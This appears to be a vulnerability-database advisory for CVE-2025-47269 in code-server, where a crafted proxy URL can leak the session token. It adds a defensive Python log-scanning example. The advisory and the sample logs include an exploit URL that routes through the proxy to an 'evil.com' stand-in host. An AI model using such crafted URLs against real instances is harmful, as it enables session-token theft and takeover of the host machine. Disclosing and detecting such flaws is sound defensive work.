Code-Asher

#31013 of 53,608
8.3 Total CVSS
Vulnerabilities · 1
PT-2025-20599
8.3
2025-05-09
Unknown · Code-Server · CVE-2025-47269
**Name of the Vulnerable Software and Affected Versions**

code-server versions prior to 4.99.4

**Description**

The issue allows an attacker to gain access to the session token through a maliciously crafted URL using the proxy subpath. This can result in the attacker proxying to an arbitrary domain, potentially exfiltrating a user's session token. The malicious URL, for example `https://<code-server>/proxy/test@evil.com/path`, would be proxied to `test@evil.com/path`. With access to the session cookie, the attacker can log into code-server and have full access to the machine hosting code-server as the user running code-server.

**Recommendations**

For versions prior to 4.99.4, update to version 4.99.4 to resolve the issue. As a temporary workaround, consider disabling the built-in proxy until a patch is available. Restrict access to the proxy subpath to minimize the risk of exploitation. Avoid clicking on maliciously crafted links that reference the `/proxy` subpath in code-server instances.
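To support the recommendation to restrict the proxy subpath, the following added example (not code from code-server or from this advisory) validates the segment after `/proxy/` and flags non-conforming requests in access logs. It assumes that segment is meant to be a local TCP port; the helper names, the URL construction in `upstream_host`, and the log lines are constructed for illustration.

```python
import re
from urllib.parse import urlsplit

# Assumption: the path segment after /proxy/ is meant to be a local TCP port.
PROXY_SEGMENT = re.compile(r"^/proxy/([^/?#]*)")
REQUEST_LINE = re.compile(r'"[A-Z]+ (\S+) HTTP/[\d.]+"')


def is_valid_port(segment: str) -> bool:
    """Accept only plain ASCII decimal digits in the range 1-65535."""
    return bool(re.fullmatch(r"[0-9]{1,5}", segment)) and 1 <= int(segment) <= 65535


def upstream_host(segment: str) -> str:
    """Host a URL parser sees when the segment is placed in the port position.

    Hypothetical construction, used only to show the parsing ambiguity:
    everything before '@' is read as userinfo, so the host changes.
    """
    return urlsplit(f"http://127.0.0.1:{segment}/").hostname


def flag_proxy_requests(log_lines):
    """Return (path, segment) for each /proxy/ request whose segment is not a port."""
    hits = []
    for line in log_lines:
        req = REQUEST_LINE.search(line)
        if not req:
            continue
        seg = PROXY_SEGMENT.match(req.group(1))
        if seg and not is_valid_port(seg.group(1)):
            hits.append((req.group(1), seg.group(1)))
    return hits


# Constructed sample access-log lines (not real traffic).
SAMPLE_LOG = [
    '203.0.113.7 - - [09/May/2025:10:00:01 +0000] "GET /proxy/8080/index.html HTTP/1.1" 200 512',
    '203.0.113.7 - - [09/May/2025:10:00:05 +0000] "GET /proxy/test@evil.com/path HTTP/1.1" 502 0',
    '203.0.113.9 - - [09/May/2025:10:00:09 +0000] "GET /proxy/99999/ HTTP/1.1" 400 0',
    '203.0.113.9 - - [09/May/2025:10:00:11 +0000] "GET /healthz HTTP/1.1" 200 2',
]

if __name__ == "__main__":
    for path, segment in flag_proxy_requests(SAMPLE_LOG):
        print(f"suspicious proxy request: {path} (segment={segment!r}, "
              f"parsed host={upstream_host(segment)!r})")
```

The same `is_valid_port` check can be enforced at a reverse proxy in front of code-server so that only numeric `/proxy/<port>/` paths reach the instance.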